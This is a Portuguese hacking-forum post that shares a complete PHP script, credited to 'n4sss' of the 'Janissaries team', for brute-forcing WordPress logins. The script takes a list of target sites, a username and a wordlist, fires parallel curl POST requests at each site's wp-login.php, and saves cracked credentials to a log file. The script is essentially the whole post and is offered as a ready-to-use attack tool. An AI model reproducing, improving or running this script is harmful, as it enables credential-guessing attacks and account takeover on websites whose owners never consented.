Script web para brute em wordpress.
Code:
Youtube:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Code:
Código PHP:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Wp Brute force</title>
<style type="text/css">
body
{
margin: 0px;
padding: 0px;
background: #F6F4F3;
font-family: 'Source Sans Pro', sans-serif;
font-size: 12pt;
font-weight: 400;
color: #4E4D4D;
text-align: center;
}
.container
{tvlw m
width: 1000px;
margin-top: 10px;
margin-right: auto;
margin-bottom: 10px;
margin-left: auto;
color: #999;
font-family: Verdana, Geneva, sans-serif;
font-size: 12px;
}
table.bordasimples tr td {
border: 1px dashed #4169E1;
}
table.main tr td {
border: 1px dashed #000;
}
textarea {
resize: none;
}
#copyright p
{
letter-spacing: 0.20em;
text-align: center;
text-transform: uppercase;
font-size: 0.80em;
color: #6F6F6F;
}
</style>
</head>
<?php flush(); ?>
<body><div id="copyright" class="container">
<table align="center" class="main">
<tr>
<td>
<div id="copyright2" class="container">
<center> <p>
WORDPRESS BRUTE FORCE BY N4SSS<br><br>
<form method="post" action="">
<p>USERNAME:
<input name="username" type="text" value="admin" maxlength="10" />
<p>PASS THREADS:
<select name=threads>
<option name=one value="1"> 1 </option>
<option name=two value="5" selected> 5 </option>
<option name=three value="10"> 10 </option>
<option name=four value="15"> 15 </option>
</select>
<p>WORDLIST FILE:
<input name="wordlist" type="text" value="wordlist.txt" maxlength="30" /> <br>
<p>LOG_FILE:
<input type="text" name="log" id="textfield" value="wp_ok.txt" />
</tr></td></table>
<br />
<br />
<p>SITE LIST:<br />
<textarea name="sites" cols="50" rows="20"></textarea>
<br />
<input class="container" name="submit" type="submit" value="DO THE BRUTE" />
</form></center>
<br />
<br />
<br />
<p>Janissaries team<br />
HTTP://JANISSARIES.ORG</p>
</div>
</div>
</body>
</html>
<?php
/*
* Wordpress Brute Force by n4sss
* -> Twitter: @n4sss
* -> Contact: n-l4b@hotmail.com
* -> http://janissaries.org
* */
set_time_limit(0);
error_reporting(0);
function save_content($content, $file){
$fp = fopen($file, "a");
fwrite($fp, $content."\r\n");
fclose($fp);
flush();
}
function la_brute($url, $username, $wordlist, $thread, $log){
$multi = curl_multi_init();
$bol = array_chunk($wordlist,$thread);
$c = 1;
if(!preg_match('/http/', $url)) $url = 'http://'.$url;
echo 'Bruting '.$url.'<br>';
foreach($bol as $password){
for($i=0;$i<=count($password)-1;$i++){
$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, $url.'/wp-login.php');
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 10);
curl_setopt($ch[$i], CURLOPT_COOKIEJAR, 'nx.cookie');
curl_setopt($ch[$i], CURLOPT_POST, TRUE);
curl_setopt($ch[$i], CURLOPT_REFERER, $url.'/wp-admin/');
curl_setopt($ch[$i], CURLOPT_POSTFIELDS, 'log='.$username.'&pwd='.$password[$i].'&wp-submit=Log%20In&redirect_to='.$url.'/wp-admin/&testcookie=1');
curl_multi_add_handle($multi, $ch[$i]);
}do{
curl_multi_exec($multi, $handl);usleep(1);
}
while($handl>0);
foreach($ch as $ch_id => $output){
$result[$ch_id] = curl_multi_getcontent($output);
curl_multi_remove_handle($multi, $output);
if(preg_match('/general.php/si',$result[$ch_id])){
echo '<table align="center" class="main">';
echo '<tr>';
echo '<td><font color="#EE3B3B">[+] Bruted =><br></font></td>';
echo '<td>'.$url.' => '.$username.':'.$password[$ch_id].'<br>';
echo 'Saving to '.$log.'<br></td></tr></table>';
save_content("$url => $username:$password[$ch_id]", $log);
flush();
}
}
}
}
if($_POST){
if(!function_exists(curl_init)) die('<font color="red">[-] Not Curl HERE!<br></font>');
$username = trim($_POST['username']);
$thread = trim($_POST['threads']);
$wordlist = array_filter(file($_POST['wordlist']));
if(!is_file($_POST['wordlist'])) die('<font color="red">[-] File '.$_POST['wordlist'].' not found!</font><br>');
$log = trim($_POST['log']);
$urlz = array_filter(explode("\r\n", $_POST['sites']));
foreach($urlz as $url){
la_brute($url, $username, $wordlist, $thread, $log);
}
}
?>
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment